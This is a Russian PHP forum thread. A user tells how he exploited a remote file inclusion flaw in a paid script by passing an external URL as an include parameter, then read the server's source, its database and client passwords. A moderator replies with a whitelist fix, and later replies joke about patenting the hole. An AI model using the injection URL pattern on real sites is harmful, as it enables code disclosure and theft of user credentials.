Простые Шаблоны - опасность хака

pauk

Новичок
Простые Шаблоны - опасность хака

Сегодня достал скрипт одного проекта,
за который просили 500 баксов:), и вот как: зашел на официальный сайт.
А люди эти "упростили" себе жизнь,
они создали страницу - заголовок сверху/меню сбоку/счетчики внизу - стандарт.
Ну а текст как всегда в центре.
Так текст они выводили таким способом

www.xxx.com/index.php?text=main

и в контент вставлялся файл main.php
и тд...
И мне пришла в голову идея:
создать на Народе сайт (там РНР не исполняется при вызове)
через ссылку типа
www.xxx.com/index.php?text=http://xxx.narod.ru/myurl
я вызвал файл myurl.php
таким образом я узнал через
show_source() код PHP-файлов на сервере (а еще говорят, такое невозможно :)) , мало того - я узнал таким способом содержимое базы, получил возможность поменять все,
узнал пароли и е-майлы клиентов
(а соответственно и пароли е-майлов 50% клиентов - не секрет, что у половины везде один пароль).
Все сделал я за 40-50 минут.
Человек, обиженный на проект, так
может сильно навредить и админам и простым клиентам.
Написал я им письмо о дыре, надо скачать через 30 минут вышли в асю,
и попросили не мешать продавать свои скрипты народу, обещают за молчание 1 (Один) доллар США на WebMoney заплатить
:p

Я не указываю страницу проекта, потому как "крутые " хакеры (мама-папа неделю назад книгу типа "РНР для придурков за 20 минут" купили) этим воспользуются, скажу только: таких страниц в сети очень много - людям не следует гнаться за легким
:)

Так что:
1) Не используйте подобные "легкие" шаблоны - дорого может обойтись
2) Будьте внимательны при покупке.
500$ стоил скрипт, а мне он обошелся в 10 рублей (время интернета)

ЗЫ. Призываю не повторять мои действия для нанесения вреда
:D Люди писали-старались все-таки, хоть и ручки кривые да пальцы кучерявые, но вредить им не рекомендую:D
 

confguru

ExAdmin
Команда форума
Ну раз ты все у них украл(стырил)
что кстати попадает под уголовную отвественность - так всегда есть логи
на сервере, твоего прова, майл/ру, и прочее

Попробуй модифицировать код
index.php и доложи о результатах :)

PHP:
switch ($text) {
case 'main': 
include ('main.php');
break;
default:
include ('main.php');
break;
}
P.S. Умные люди уже заказывают вебпрограмминг у нормальных программеров ,-Ь
 

Demiurg

Guest
здесь пол кулуба такие скрипты пишут, и что ? дырок мы что ли не видели ?
 

Фанат

oncle terrible
Команда форума
ты форумом ошибся.
эту важную информацию надо повесить в форуме для профессионалов.
И кверху прикрепить.
Да чего там - все остальное вообще пожно постирать.
Спасибо, что ты написал такое развернутое исследование по этому вопросу.
Глаза открыл.
 

confguru

ExAdmin
Команда форума
Я требую огласить автора скрипта!
Если за каждую глупость они дают по 1уе
то за 8 часов можно спокойно заработать
50уе :) не особо напрягаясь ,)
 

Romantik

TeaM PHPClub
Нет, давайте запатентуем эту дыру, и будем брать денежки со всех кто ее сделает и использует.
 

Demiurg

Guest
а я запатентую прием начинания скрипта с <? и <?php
 

confguru

ExAdmin
Команда форума
а я запентую слово upload и $_FILES и
буду требовать отчисления с тех кто хочет грузить картинки в базу и загружать файлы
с помощью этих переменных :)
 

Romantik

TeaM PHPClub
Я уже запатентовал буквы на этом форуме= Вы уже должны... пишите-пЕшите... счетчик работает =)
 

Tonn

Новичок
Патентую ники admin, demiurg, Romantik, tony2001 и в довесок фамилии Петросян и Хоттабыч.
 

York

Новичок
мда, чувствую мне нифига не осталось :)

что мне запатентовать? :)
 
Сверху